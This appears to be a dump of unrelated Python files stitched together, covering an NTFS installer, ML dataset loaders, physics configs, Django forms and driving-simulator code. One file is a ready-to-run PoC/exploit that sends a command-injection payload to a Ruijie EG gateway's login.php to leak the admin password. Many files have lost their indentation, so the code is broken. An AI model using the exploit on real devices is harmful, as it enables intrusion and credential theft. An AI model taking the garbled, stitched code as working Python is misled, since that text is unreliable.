def install():
user = os.getenv("SUDO_USER")
user_id = os.getenv("SUDO_UID")
group_id = os.getenv("SUDO_GID")
if os.geteuid() != 0 or user is None or user_id is None or group_id is None:
print("Need root to configure sudoers, try again with sudo")
return
env = ezntfs.get_environment_info()
if env.fuse is None:
print("Failed to detect macFUSE")
return
if env.ntfs_3g is None:
print("Failed to detect ntfs-3g")
return
app_path = shutil.which("ezntfs-app")
if app_path is None:
print("Could not find ezntfs-app in the path")
return
sudoers_config_path = f"/private/etc/sudoers.d/{APP_NAME.replace('.', '-')}"
with open(sudoers_config_path, "w") as sudoers_config_file:
sudoers_config_file.write(f"%#{group_id}\t\tALL = NOPASSWD: {ezntfs.NTFS_3G_PATH}\n")
launchd_config_path = f"{Path.home()}/Library/LaunchAgents/{APP_NAME}.plist"
with open(launchd_config_path, "w") as launchd_config_file:
launchd_config_file.write(LAUNCHD_CONFIG_TEMPLATE.format(
app_name=APP_NAME,
ntfs_3g_path=ezntfs.NTFS_3G_PATH,
app_path=app_path,
))
os.chown(sudoers_config_path, 0, 0)
os.chmod(sudoers_config_path, 0o640)
os.chown(launchd_config_path, int(user_id), int(group_id))
subprocess.run(["su", "-", user, "-c", f"launchctl unload -F {launchd_config_path}"], capture_output=True)
subprocess.run(["su", "-", user, "-c", f"launchctl load -F {launchd_config_path}"], capture_output=True)
print("Installation complete! Try plugging an NTFS drive in.")
print("NOTE: You may need to grant python access to removable volumes.")
def uninstall():
if os.geteuid() != 0:
print("Need root to remove sudoers config, try again with sudo")
return
with contextlib.suppress(FileNotFoundError):
os.remove(f"/private/etc/sudoers.d/{APP_NAME.replace('.', '-')}")
with contextlib.suppress(FileNotFoundError):
os.remove(f"{Path.home()}/Library/LaunchAgents/{APP_NAME}.plist")
print("Uninstallation complete!")
|
157254
|
from data_vault import clean_line
from data_vault.parsing import unquote, bool_or_str
def test_clean_line():
pieces = clean_line('from module import a, b, c')
assert pieces == ['from', 'module', 'import', 'a,b,c']
# commas
pieces = clean_line('from "a/path/with/c,o,m,m,a,s" import a, b, c')
assert pieces == ['from', '"a/path/with/c,o,m,m,a,s"', 'import', 'a,b,c']
pieces = clean_line("from 'a/path/with/c,o,m,m,a,s' import a, b, c")
assert pieces == ['from', "'a/path/with/c,o,m,m,a,s'", 'import', 'a,b,c']
# escaped paths
pieces = clean_line(r"from 'an/escaped\'path/' import a, b, c")
assert pieces == ['from', r"'an/escaped\'path/'", 'import', 'a,b,c']
# comments
pieces = clean_line('from module import a, b#, c')
assert pieces == ['from', 'module', 'import', 'a,b']
def test_unquote():
assert unquote("'an/escaped\'path/'") == 'an/escaped\'path/'
assert unquote('"an/escaped\"path/"') == 'an/escaped\"path/'
def test_bool_or_str():
assert bool_or_str('a') == 'a'
assert bool_or_str('True') is True
assert bool_or_str('False') is False
assert bool_or_str('true') == 'true'
|
157255
|
# Jython example: Confidential is a Java class, and Java reflection lets us
# read its private 'secret' field. Jython implements Python 2, hence the
# print statement syntax below.
import Confidential

message = Confidential('top secret text')
secret_field = Confidential.getDeclaredField('secret')
secret_field.setAccessible(True)  # break the lock!
print 'message.secret =', secret_field.get(message)
|
157265
|
import FWCore.ParameterSet.Config as cms
import FWCore.ParameterSet.VarParsing as VarParsing
from PhysicsTools.PatAlgos.tools.helpers import getPatAlgosToolsTask
import sys
process = cms.Process("Analyzer")
patAlgosToolsTask = getPatAlgosToolsTask(process)
## defining command line options
options = VarParsing.VarParsing ('standard')
options.register('runOnAOD', True, VarParsing.VarParsing.multiplicity.singleton, VarParsing.VarParsing.varType.bool, "run on AOD")
## processing provided options
if hasattr(sys, "argv"):
    for args in sys.argv:
        arg = args.split(',')
        for val in arg:
            val = val.split('=')
            if len(val) == 2:
                setattr(options, val[0], val[1])
## setting process options
process.options = cms.untracked.PSet(
    wantSummary = cms.untracked.bool(False)
)
## configure message logger
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.MessageLogger.cerr.threshold = 'INFO'
process.MessageLogger.cerr.FwkReport.reportEvery = 100
## define input
if options.runOnAOD:
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(
## add your favourite AOD files here (1000+ events in each file defined below)
'/store/mc/RunIISpring15DR74/ttHTobb_M125_13TeV_powheg_pythia8/AODSIM/Asympt25ns_MCRUN2_74_V9-v1/00000/02203C96-2108-E511-B5C1-00266CFCC214.root',
'/store/mc/RunIISpring15DR74/ttHTobb_M125_13TeV_powheg_pythia8/AODSIM/Asympt25ns_MCRUN2_74_V9-v1/00000/02332898-9808-E511-81E8-3417EBE34BFD.root',
'/store/mc/RunIISpring15DR74/ttHTobb_M125_13TeV_powheg_pythia8/AODSIM/Asympt25ns_MCRUN2_74_V9-v1/00000/060177B4-2E08-E511-83AD-3417EBE644DA.root',
## other AOD samples
# '/store/mc/RunIISpring15DR74/TT_TuneCUETP8M1_13TeV-powheg-pythia8/AODSIM/Asympt50ns_MCRUN2_74_V9A-v4/10000/00199A75-540F-E511-8277-0002C92DB464.root',
# '/store/mc/RunIISpring15DR74/TT_TuneCUETP8M1_13TeV-powheg-pythia8/AODSIM/Asympt50ns_MCRUN2_74_V9A-v4/10000/001B27B8-550F-E511-85CF-0025905A609A.root',
# '/store/mc/RunIISpring15DR74/TT_TuneCUETP8M1_13TeV-powheg-pythia8/AODSIM/Asympt50ns_MCRUN2_74_V9A-v4/10000/007E116A-510F-E511-8D40-F04DA275C007.root',
),
skipEvents = cms.untracked.uint32(0)
)
else:
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(
# add your favourite miniAOD files here (1000+ events in each file defined below)
'/store/mc/RunIISpring15DR74/ttHTobb_M125_13TeV_powheg_pythia8/MINIAODSIM/Asympt25ns_MCRUN2_74_V9-v1/00000/141B9915-1F08-E511-B9FF-001E675A6AB3.root',
# '/store/mc/RunIISpring15DR74/TT_TuneCUETP8M1_13TeV-powheg-pythia8/MINIAODSIM/Asympt50ns_MCRUN2_74_V9A-v4/10000/00D2A247-2910-E511-9F3D-0CC47A4DEDD2.root',
),
skipEvents = cms.untracked.uint32(0)
)
## define maximal number of events to loop over
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1000)
)
# Setting input particle/jet collections to be used by the tools
genParticleCollection = ''
genJetCollection = 'ak4GenJetsCustom'
if options.runOnAOD:
genParticleCollection = 'genParticles'
## producing a subset of genParticles to be used for jet reclustering
from RecoJets.Configuration.GenJetParticles_cff import genParticlesForJetsNoNu
process.genParticlesForJetsCustom = genParticlesForJetsNoNu.clone(
src = genParticleCollection
)
patAlgosToolsTask.add(process.genParticlesForJetsCustom)
# Producing own jets for testing purposes
from RecoJets.JetProducers.ak4GenJets_cfi import ak4GenJets
process.ak4GenJetsCustom = ak4GenJets.clone(
src = 'genParticlesForJetsCustom',
rParam = cms.double(0.4),
jetAlgorithm = cms.string("AntiKt")
)
patAlgosToolsTask.add(process.ak4GenJetsCustom)
else:
genParticleCollection = 'prunedGenParticles'
genJetCollection = 'slimmedGenJets'
# Supplies PDG ID to real name resolution of MC particles
process.load("SimGeneral.HepPDTESSource.pythiapdt_cfi")
# Ghost particle collection used for Hadron-Jet association
# MUST use proper input particle collection
from PhysicsTools.JetMCAlgos.HadronAndPartonSelector_cfi import selectedHadronsAndPartons
process.selectedHadronsAndPartons = selectedHadronsAndPartons.clone(
particles = genParticleCollection
)
patAlgosToolsTask.add(process.selectedHadronsAndPartons)
# Input particle collection for matching to gen jets (partons + leptons)
# MUST use proper input jet collection: the jets to which hadrons should be associated
# rParam and jetAlgorithm MUST match those used for jets to be associated with hadrons
# More details on the tool: https://twiki.cern.ch/twiki/bin/view/CMSPublic/SWGuideBTagMCTools#New_jet_flavour_definition
from PhysicsTools.JetMCAlgos.AK4PFJetsMCFlavourInfos_cfi import ak4JetFlavourInfos
process.genJetFlavourInfos = ak4JetFlavourInfos.clone(
jets = genJetCollection,
)
patAlgosToolsTask.add(process.genJetFlavourInfos)
# Plugin for analysing B hadrons
# MUST use the same particle collection as in selectedHadronsAndPartons
from PhysicsTools.JetMCAlgos.GenHFHadronMatcher_cff import matchGenBHadron
process.matchGenBHadron = matchGenBHadron.clone(
genParticles = genParticleCollection,
jetFlavourInfos = "genJetFlavourInfos"
)
patAlgosToolsTask.add(process.matchGenBHadron)
# Plugin for analysing C hadrons
# MUST use the same particle collection as in selectedHadronsAndPartons
from PhysicsTools.JetMCAlgos.GenHFHadronMatcher_cff import matchGenCHadron
process.matchGenCHadron = matchGenCHadron.clone(
genParticles = genParticleCollection,
jetFlavourInfos = "genJetFlavourInfos"
)
patAlgosToolsTask.add(process.matchGenCHadron)
## configuring the testing analyzer that produces output tree
process.matchGenHFHadrons = cms.EDAnalyzer("matchGenHFHadrons",
# phase space of jets to be stored
genJetPtMin = cms.double(20),
genJetAbsEtaMax = cms.double(2.4),
# input tags holding information about matching
genJets = cms.InputTag(genJetCollection),
genBHadJetIndex = cms.InputTag("matchGenBHadron", "genBHadJetIndex"),
genBHadFlavour = cms.InputTag("matchGenBHadron", "genBHadFlavour"),
genBHadFromTopWeakDecay = cms.InputTag("matchGenBHadron", "genBHadFromTopWeakDecay"),
genBHadPlusMothers = cms.InputTag("matchGenBHadron", "genBHadPlusMothers"),
genBHadPlusMothersIndices = cms.InputTag("matchGenBHadron", "genBHadPlusMothersIndices"),
genBHadIndex = cms.InputTag("matchGenBHadron", "genBHadIndex"),
genBHadLeptonHadronIndex = cms.InputTag("matchGenBHadron", "genBHadLeptonHadronIndex"),
genBHadLeptonViaTau = cms.InputTag("matchGenBHadron", "genBHadLeptonViaTau"),
genCHadJetIndex = cms.InputTag("matchGenCHadron", "genCHadJetIndex"),
genCHadFlavour = cms.InputTag("matchGenCHadron", "genCHadFlavour"),
genCHadFromTopWeakDecay = cms.InputTag("matchGenCHadron", "genCHadFromTopWeakDecay"),
genCHadBHadronId = cms.InputTag("matchGenCHadron", "genCHadBHadronId"),
genCHadPlusMothers = cms.InputTag("matchGenCHadron", "genCHadPlusMothers"),
genCHadPlusMothersIndices = cms.InputTag("matchGenCHadron", "genCHadPlusMothersIndices"),
genCHadIndex = cms.InputTag("matchGenCHadron", "genCHadIndex"),
genCHadLeptonHadronIndex = cms.InputTag("matchGenCHadron", "genCHadLeptonHadronIndex"),
genCHadLeptonViaTau = cms.InputTag("matchGenCHadron", "genCHadLeptonViaTau"),
)
## setting up output root file
process.TFileService = cms.Service("TFileService",
fileName = cms.string("matchGenHFHadrons_trees.root")
)
## defining only the final modules to run: dependencies are run automatically (unscheduled execution)
process.p1 = cms.Path(
process.matchGenHFHadrons
)
## module to store raw output from the processed modules into the ROOT file
process.out = cms.OutputModule("PoolOutputModule",
fileName = cms.untracked.string('matchGenHFHadrons_out.root'),
outputCommands = cms.untracked.vstring('drop *', 'keep *_matchGen*_*_*')
)
process.outpath = cms.EndPath(process.out, patAlgosToolsTask)
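
## --- Hedged usage note (not part of the original config) ---
## The VarParsing loop above allows registered options to be overridden on the
## command line, e.g. (the config filename here is a placeholder):
##   cmsRun matchGenHFHadrons_cfg.py runOnAOD=False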
|
157283
|
import os
import torch
from torchvision import transforms
from PIL import Image, ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
def get_domains(dataset_name):
return globals()[dataset_name].DOMAINS
class ImageDataset(torch.utils.data.Dataset):
def __init__(self, file_path, image_dir, transform=None):
self.file_path = file_path
self.image_dir = image_dir
self.transform = transform
self.image_paths = []
self.labels = []
self._read_file()
def __len__(self):
return len(self.image_paths)
def __getitem__(self, idx):
path = os.path.join(self.image_dir, self.image_paths[idx])
with open(path, 'rb') as f:
image = Image.open(f).convert('RGB')
label = self.labels[idx]
if self.transform is not None:
image = self.transform(image)
return image, label
def _read_file(self):
with open(self.file_path) as f:
for line in f:
path, label = line.strip().split(',')
self.image_paths.append(path)
self.labels.append(int(label) - 1)
class MultiDomainDataset:
def __init__(self, root_dir, test_dom_idx):
images_dir = os.path.join(root_dir, 'images')
split_dir = os.path.join(root_dir, 'split')
domains = [f.name for f in os.scandir(images_dir) if f.is_dir()]
domains.sort()
test_dom = domains[test_dom_idx]
train_doms = [d for d in domains if d != test_dom]
transform = transforms.Compose([
transforms.Resize((224, 224)),
transforms.ToTensor(),
transforms.Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])])
train_datasets, val_datasets = [], []
for dom_name in train_doms:
train_datasets.append(ImageDataset(
os.path.join(split_dir, dom_name + '_train.txt'),
images_dir,
transform))
val_datasets.append(ImageDataset(
os.path.join(split_dir, dom_name + '_val.txt'),
images_dir,
transform))
self.datasets = {}
self.datasets['train'] = train_datasets
self.datasets['val'] = torch.utils.data.ConcatDataset(val_datasets)
self.datasets['test'] = ImageDataset(
os.path.join(split_dir, test_dom + '_test.txt'),
images_dir,
transform)
def __getitem__(self, phase):
if phase in ['train', 'val', 'test']:
return self.datasets[phase]
        else:
            raise ValueError(f"Unknown phase: {phase!r}")
class VLCS(MultiDomainDataset):
N_CLASSES = 5
DOMAINS = ['C', 'L', 'S', 'V']
def __init__(self, root_dir, test_dom_idx):
self.root_dir = os.path.join(root_dir, 'VLCS/')
super().__init__(self.root_dir, test_dom_idx)
class PACS(MultiDomainDataset):
N_CLASSES = 7
DOMAINS = ['A', 'C', 'P', 'S']
def __init__(self, root_dir, test_dom_idx):
self.root_dir = os.path.join(root_dir, 'PACS/')
super().__init__(self.root_dir, test_dom_idx)
class OfficeHome(MultiDomainDataset):
N_CLASSES = 65
DOMAINS = ['A', 'C', 'P', 'R']
def __init__(self, root_dir, test_dom_idx):
self.root_dir = os.path.join(root_dir, 'OfficeHome/')
super().__init__(self.root_dir, test_dom_idx)
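
# --- Hedged usage sketch (not part of the original module) ---
# How the classes above are meant to be consumed, assuming the PACS data is
# laid out under <root>/PACS/{images,split} as _read_file expects.
if __name__ == '__main__':
    dataset = PACS(root_dir='data/', test_dom_idx=0)   # hold out domain 'A'
    train_loader = torch.utils.data.DataLoader(
        torch.utils.data.ConcatDataset(dataset['train']),
        batch_size=32, shuffle=True)
    images, labels = next(iter(train_loader))
    print(images.shape, labels.shape)  # e.g. torch.Size([32, 3, 224, 224])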
|
157311
|
from django import forms
from django.forms.extras.widgets import SelectDateWidget
from django.contrib.humanize.templatetags.humanize import apnumber
from django.template.defaultfilters import pluralize
try:
    from functools import wraps
except ImportError:
    from django.utils.functional import wraps  # Python 2.3, 2.4 fallback.
import models
from django.forms.widgets import RadioSelect, CheckboxSelectMultiple
from systems.models import Allocation, SystemStatus, OperatingSystem
from core.site.models import Site
class MultiSelectFormField(forms.MultipleChoiceField):
widget = forms.CheckboxSelectMultiple
def __init__(self, *args, **kwargs):
self.max_choices = kwargs.pop('max_choices', 0)
super(MultiSelectFormField, self).__init__(*args, **kwargs)
def clean(self, value):
if not value and self.required:
raise forms.ValidationError(self.error_messages['required'])
if value and self.max_choices and len(value) > self.max_choices:
raise forms.ValidationError('You must select a maximum of %s choice%s.'
% (apnumber(self.max_choices), pluralize(self.max_choices)))
return value
class ReportForm(forms.Form):
system_type = MultiSelectFormField(
required=True,
choices=[
('SYSTEM', 'SYSTEM'),
#('UNMANAGED', 'UNMANAGED'),
] )
output = forms.ChoiceField(
required=False,
choices=[
('SCREEN', 'SCREEN'),
('CSV', 'CSV'),
] )
system_status = forms.MultipleChoiceField(
required=False,
widget=CheckboxSelectMultiple(attrs={'class': 'system_status'}),
choices=[('-1', 'All')] + [(m.id, m) for m in SystemStatus.objects.all()])
site = forms.MultipleChoiceField(
required=False,
widget=CheckboxSelectMultiple(attrs={'class': 'system_site'}),
choices=[('-1', 'All')] + [(m.id, m) for m in Site.objects.all()])
allocation = forms.ChoiceField(
required=False,
choices=[('', 'All')] + [(m.id, m)
for m in Allocation.objects.all()])
    operating_system = forms.CharField(
        max_length=72,
        required=False,
    )
    server_models = forms.CharField(
        max_length=72,
        required=False,
    )
|
157312
|
from PIL import Image
from numpy import *
from scipy.ndimage import measurements,morphology
"""
This is the morphology counting objects example in Section 1.4.
"""
# load image and threshold to make sure it is binary
im = array(Image.open('../data/houses.png').convert('L'))
im = (im < 128)

labels, nbr_objects = measurements.label(im)
print("Number of objects:", nbr_objects)

# morphology - opening to separate objects better
im_open = morphology.binary_opening(im, ones((9, 5)), iterations=2)

labels_open, nbr_objects_open = measurements.label(im_open)
print("Number of objects:", nbr_objects_open)
|
157333
|
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Ruijie EG Easy Gateway Password Leak''',
"description": '''Ruijie EG Easy Gateway login.php has CLI command injection, which leads to the disclosure of administrator account and password vulnerability''',
"severity": "high",
"references": [
"http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20%E7%AE%A1%E7%90%86%E5%91%98%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html",
"https://www.ruijienetworks.com"
],
"classification": {
"cvss-metrics": "",
"cvss-score": "",
"cve-id": "",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["ruijie", "exposure"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/login.php"""
method = "POST"
data = """username=admin&password=<PASSWORD>?show+webmaster+user"""
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if ("""data":""" in resp0.text and """status":1""" in resp0.text and """admin""" in resp0.text) and ("""text/json""" in str(resp0.headers)) and (resp0.status_code == 200):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
|
157335
|
from functools import partial
from mkreports.md import MdProxy
def test_md_proxy(page_info):
md_proxy = MdProxy(page_info=page_info, md_defaults=dict(Table=dict(max_rows=1000)))
test_table = md_proxy.Table
assert isinstance(test_table, partial)
assert test_table.keywords["max_rows"] == 1000
|
157364
|
import logging
from metadrive.component.road_network.node_road_network import NodeRoadNetwork
import numpy as np
from panda3d.core import TransparencyAttrib, LineSegs, NodePath
from metadrive.component.lane.circular_lane import CircularLane
from metadrive.component.map.base_map import BaseMap
from metadrive.component.pgblock.first_block import FirstPGBlock
from metadrive.component.road_network import Road
from metadrive.constants import RENDER_MODE_ONSCREEN, CamMask
from metadrive.engine.asset_loader import AssetLoader
from metadrive.utils import clip, norm, get_np_random
from metadrive.utils.coordinates_shift import panda_position
from metadrive.utils.scene_utils import ray_localization
from metadrive.utils.space import Parameter, BlockParameterSpace
class BaseNavigation:
navigation_info_dim = 10
NAVI_POINT_DIST = 50
PRE_NOTIFY_DIST = 40
MIN_ALPHA = 0.15
CKPT_UPDATE_RANGE = 5
FORCE_CALCULATE = False
LINE_TO_DEST_HEIGHT = 0.6
def __init__(
self,
engine,
show_navi_mark: bool = False,
random_navi_mark_color=False,
show_dest_mark=False,
show_line_to_dest=False
):
"""
This class define a helper for localizing vehicles and retrieving navigation information.
It now only support from first block start to the end node, but can be extended easily.
"""
self.map = None
self.checkpoints = None
self._target_checkpoints_index = None
self.current_ref_lanes = None
self.next_ref_lanes = None
self.final_lane = None
self.current_lane = None
        self._navi_info = np.zeros((self.navigation_info_dim, ), dtype=np.float32)  # navigation information result
# Vis
self._show_navi_info = (engine.mode == RENDER_MODE_ONSCREEN and not engine.global_config["debug_physics_world"])
self.origin = NodePath("navigation_sign") if self._show_navi_info else None
self.navi_mark_color = (0.6, 0.8, 0.5) if not random_navi_mark_color else get_np_random().rand(3)
self.navi_arrow_dir = [0, 0]
self._dest_node_path = None
self._goal_node_path = None
self._line_to_dest = None
self._show_line_to_dest = show_line_to_dest
if self._show_navi_info:
# nodepath
self._line_to_dest = self.origin.attachNewNode("line")
self._goal_node_path = self.origin.attachNewNode("target")
self._dest_node_path = self.origin.attachNewNode("dest")
if show_navi_mark:
navi_point_model = AssetLoader.loader.loadModel(AssetLoader.file_path("models", "box.bam"))
navi_point_model.reparentTo(self._goal_node_path)
if show_dest_mark:
dest_point_model = AssetLoader.loader.loadModel(AssetLoader.file_path("models", "box.bam"))
dest_point_model.reparentTo(self._dest_node_path)
if show_line_to_dest:
line_seg = LineSegs("line_to_dest")
line_seg.setColor(self.navi_mark_color[0], self.navi_mark_color[1], self.navi_mark_color[2], 0.7)
line_seg.setThickness(2)
self._dynamic_line_np = NodePath(line_seg.create(True))
self._dynamic_line_np.reparentTo(self.origin)
self._line_to_dest = line_seg
self._goal_node_path.setTransparency(TransparencyAttrib.M_alpha)
self._dest_node_path.setTransparency(TransparencyAttrib.M_alpha)
self._goal_node_path.setColor(
self.navi_mark_color[0], self.navi_mark_color[1], self.navi_mark_color[2], 0.7
)
self._dest_node_path.setColor(
self.navi_mark_color[0], self.navi_mark_color[1], self.navi_mark_color[2], 0.7
)
self._goal_node_path.hide(CamMask.AllOn)
self._dest_node_path.hide(CamMask.AllOn)
self._goal_node_path.show(CamMask.MainCam)
self._dest_node_path.show(CamMask.MainCam)
logging.debug("Load Vehicle Module: {}".format(self.__class__.__name__))
def reset(self, map: BaseMap, current_lane):
self.map = map
self.current_lane = current_lane
def set_route(self, current_lane_index: str, destination: str):
"""
Find a shortest path from start road to end road
:param current_lane_index: start road node
:param destination: end road node or end lane index
:return: None
"""
raise NotImplementedError
def update_localization(self, ego_vehicle):
"""
It is called every step
"""
raise NotImplementedError
def _get_info_for_checkpoint(self, lanes_id, ref_lane, ego_vehicle):
navi_information = []
# Project the checkpoint position into the target vehicle's coordination, where
# +x is the heading and +y is the right hand side.
        lateral_middle = (float(self.get_current_lane_num()) / 2 - 0.5) * self.get_current_lane_width()
        check_point = ref_lane.position(ref_lane.length, lateral_middle)
dir_vec = check_point - ego_vehicle.position # get the vector from center of vehicle to checkpoint
dir_norm = norm(dir_vec[0], dir_vec[1])
if dir_norm > self.NAVI_POINT_DIST: # if the checkpoint is too far then crop the direction vector
dir_vec = dir_vec / dir_norm * self.NAVI_POINT_DIST
ckpt_in_heading, ckpt_in_rhs = ego_vehicle.projection(dir_vec) # project to ego vehicle's coordination
# Dim 1: the relative position of the checkpoint in the target vehicle's heading direction.
navi_information.append(clip((ckpt_in_heading / self.NAVI_POINT_DIST + 1) / 2, 0.0, 1.0))
# Dim 2: the relative position of the checkpoint in the target vehicle's right hand side direction.
navi_information.append(clip((ckpt_in_rhs / self.NAVI_POINT_DIST + 1) / 2, 0.0, 1.0))
if lanes_id == 0:
lanes_heading = ref_lane.heading_theta_at(ref_lane.local_coordinates(ego_vehicle.position)[0])
else:
lanes_heading = ref_lane.heading_theta_at(min(self.PRE_NOTIFY_DIST, ref_lane.length))
# Try to include the current lane's information into the navigation information
        bend_radius = 0.0
        direction = 0.0
        angle = 0.0
        if isinstance(ref_lane, CircularLane):
            bend_radius = ref_lane.radius / (
                BlockParameterSpace.CURVE[Parameter.radius].max +
                self.get_current_lane_num() * self.get_current_lane_width()
            )
            direction = ref_lane.direction
            if direction == 1:
                angle = ref_lane.end_phase - ref_lane.start_phase
            elif direction == -1:
                angle = ref_lane.start_phase - ref_lane.end_phase
        # Dim 3: The bending radius of current lane
        navi_information.append(clip(bend_radius, 0.0, 1.0))
        # Dim 4: The bending direction of current lane (+1 for clockwise, -1 for counterclockwise)
        navi_information.append(clip((direction + 1) / 2, 0.0, 1.0))
# Dim 5: The angular difference between the heading in lane ending position and
# the heading in lane starting position
navi_information.append(
clip((np.rad2deg(angle) / BlockParameterSpace.CURVE[Parameter.angle].max + 1) / 2, 0.0, 1.0)
)
return navi_information, lanes_heading, check_point
def _update_target_checkpoints(self, ego_lane_index, ego_lane_longitude):
raise NotImplementedError
def get_navi_info(self):
return self._navi_info
def destroy(self):
if self._show_navi_info:
try:
self._line_to_dest.removeNode()
except AttributeError:
pass
self._dest_node_path.removeNode()
self._goal_node_path.removeNode()
self.next_ref_lanes = None
self.current_ref_lanes = None
def set_force_calculate_lane_index(self, force: bool):
self.FORCE_CALCULATE = force
def __del__(self):
logging.debug("{} is destroyed".format(self.__class__.__name__))
def get_current_lateral_range(self, current_position, engine) -> float:
raise NotImplementedError
def get_current_lane_width(self) -> float:
return self.current_lane.width
def get_current_lane_num(self) -> float:
return len(self.current_ref_lanes)
def _get_current_lane(self, ego_vehicle):
"""
Called in update_localization to find current lane information
"""
possible_lanes = ray_localization(
ego_vehicle.heading, ego_vehicle.position, ego_vehicle.engine, return_all_result=True
)
for lane, index, l_1_dist in possible_lanes:
if lane in self.current_ref_lanes:
return lane, index
nx_ckpt = self._target_checkpoints_index[-1]
if nx_ckpt == self.checkpoints[-1] or self.next_ref_lanes is None:
return possible_lanes[0][:-1] if len(possible_lanes) > 0 else (None, None)
if self.map.road_network_type == NodeRoadNetwork:
nx_nx_ckpt = nx_ckpt + 1
next_ref_lanes = self.map.road_network.graph[self.checkpoints[nx_ckpt]][self.checkpoints[nx_nx_ckpt]]
else:
next_ref_lanes = self.next_ref_lanes
for lane, index, l_1_dist in possible_lanes:
if lane in next_ref_lanes:
return lane, index
return possible_lanes[0][:-1] if len(possible_lanes) > 0 else (None, None)
def _update_current_lane(self, ego_vehicle):
lane, lane_index = self._get_current_lane(ego_vehicle)
if lane is None:
lane, lane_index = ego_vehicle.lane, ego_vehicle.lane_index
ego_vehicle.on_lane = False
if self.FORCE_CALCULATE:
lane_index, _ = self.map.road_network.get_closest_lane_index(ego_vehicle.position)
lane = self.map.road_network.get_lane(lane_index)
self.current_lane = lane
assert lane_index == lane.index, "lane index mismatch!"
return lane, lane_index
def _ray_lateral_range(self, engine, start_position, dir, length=50):
"""
It is used to measure the lateral range of special blocks
:param start_position: start_point
:param dir: ray direction
:param length: length of ray
:return: lateral range [m]
"""
end_position = start_position[0] + dir[0] * length, start_position[1] + dir[1] * length
start_position = panda_position(start_position, z=0.15)
end_position = panda_position(end_position, z=0.15)
mask = FirstPGBlock.CONTINUOUS_COLLISION_MASK
res = engine.physics_world.static_world.rayTestClosest(start_position, end_position, mask=mask)
if not res.hasHit():
return length
else:
return res.getHitFraction() * length
def _draw_line_to_dest(self, start_position, end_position):
if not self._show_line_to_dest:
return
line_seg = self._line_to_dest
line_seg.moveTo(panda_position(start_position, self.LINE_TO_DEST_HEIGHT))
line_seg.drawTo(panda_position(end_position, self.LINE_TO_DEST_HEIGHT))
self._dynamic_line_np.removeNode()
self._dynamic_line_np = NodePath(line_seg.create(False))
self._dynamic_line_np.hide(CamMask.Shadow | CamMask.RgbCam)
self._dynamic_line_np.reparentTo(self.origin)
def detach_from_world(self):
if isinstance(self.origin, NodePath):
self.origin.detachNode()
def attach_to_world(self, engine):
if isinstance(self.origin, NodePath):
self.origin.reparentTo(engine.render)
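# Worked example (illustrative, not part of the original API): Dims 1-2 of the
# navigation vector map a projected offset from [-NAVI_POINT_DIST, NAVI_POINT_DIST]
# metres into [0, 1] via (x / NAVI_POINT_DIST + 1) / 2. With NAVI_POINT_DIST = 50:
#   clip(( 25 / 50 + 1) / 2, 0.0, 1.0) == 0.75   # checkpoint 25 m ahead
#   clip((-25 / 50 + 1) / 2, 0.0, 1.0) == 0.25   # checkpoint 25 m behind
#   clip((  0 / 50 + 1) / 2, 0.0, 1.0) == 0.50   # checkpoint at the vehicle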
|
157380
|
from importlib import import_module
import celery
from girder_worker_utils import decorators
import six
from stevedore import extension
#: Defines the namespace used for plugin entrypoints
NAMESPACE = 'girder_worker_plugins'
def _handle_entrypoint_errors(mgr, entrypoint, exc):
raise exc
def get_extension_manager(app=None):
"""Get an extension manager for the plugin namespace."""
if app is None:
app = celery.current_app
return extension.ExtensionManager(
namespace=NAMESPACE,
invoke_on_load=True,
invoke_args=(app,),
on_load_failure_callback=_handle_entrypoint_errors
)
def get_plugin_task_modules(app=None):
"""Return task modules defined by plugins."""
includes = []
for ext in get_extension_manager(app=app):
includes.extend(ext.obj.task_imports())
return includes
def import_all_includes():
"""Import all task modules for their side-effects."""
for module in get_plugin_task_modules():
import_module(module)
def get_extensions(app=None):
"""Get a list of installed extensions."""
return [ext.name for ext in get_extension_manager(app)]
def get_module_tasks(module_name):
"""Get all tasks defined in a python module.
:param str module_name: The importable module name
"""
module = import_module(module_name)
tasks = {}
if module is None:
return tasks
for name, func in six.iteritems(vars(module)):
full_name = '%s.%s' % (module_name, name)
if not hasattr(func, '__call__'):
# filter out objects that are not callable
continue
try:
decorators.get_description_attribute(func)
tasks[full_name] = func
except decorators.MissingDescriptionException:
pass
return tasks
def get_extension_tasks(extension, app=None, celery_only=False):
"""Get the tasks defined by a girder_worker extension.
:param str extension: The extension name
:param app: The celery app instance
:param bool celery_only: If true, only return celery tasks
"""
manager = get_extension_manager(app)
imports = manager[extension].obj.task_imports()
tasks = {}
for module_name in imports:
tasks.update(get_module_tasks(module_name))
if celery_only: # filter celery tasks
if app is None:
from .app import app
tasks = {
key: tasks[key] for key in tasks if key in app.tasks
}
return tasks
def discover_tasks(app):
app.conf.update({
'CELERY_INCLUDE': get_plugin_task_modules()
})
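# Usage sketch (hedged): enumerate installed plugin extensions and the tasks
# they expose; with no plugins registered under the 'girder_worker_plugins'
# entrypoint namespace, the loop simply prints nothing.
if __name__ == '__main__':
    for ext_name in get_extensions():
        print(ext_name, sorted(get_extension_tasks(ext_name)))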
|
157388
|
from unittest.mock import MagicMock
import bspump.unittest
import bspump.common
import bspump.pipeline  # imported explicitly so `bspump.pipeline.L` below resolves
